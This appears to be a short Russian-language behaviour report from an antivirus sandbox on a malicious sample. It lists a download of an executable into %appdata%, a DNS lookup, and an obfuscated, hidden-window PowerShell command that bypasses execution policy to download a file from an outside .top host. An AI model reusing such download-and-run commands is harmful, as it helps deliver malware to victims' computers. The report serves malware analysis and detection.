Техническая информация
- http://www.zoerpoled.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "PO^WERSHEL^l.^eXe^ -e^x^ecUt^i^on^pol^ic^Y Byp^A^Ss -n^Op^roFilE -WINDOw^StyLE hiDDeN^ (nEw-^oB^JeCT^ SYst^eM.^n^ET^.w^EB^ClI^Ent).dow^NlOaD^fILe^('http://www.zoerpoled.top/read....
- DNS ASK zo###oled.top
- '<SYSTEM32>\cmd.exe' /C "PO^WERSHEL^l.^eXe^ -e^x^ecUt^i^on^pol^ic^Y Byp^A^Ss -n^Op^roFilE -WINDOw^StyLE hiDDeN^ (nEw-^oB^JeCT^ SYst^eM.^n^ET^.w^EB^ClI^Ent).dow^NlOaD^fILe^('http://www.zoerpoled.top/read....' (со скрытым окном)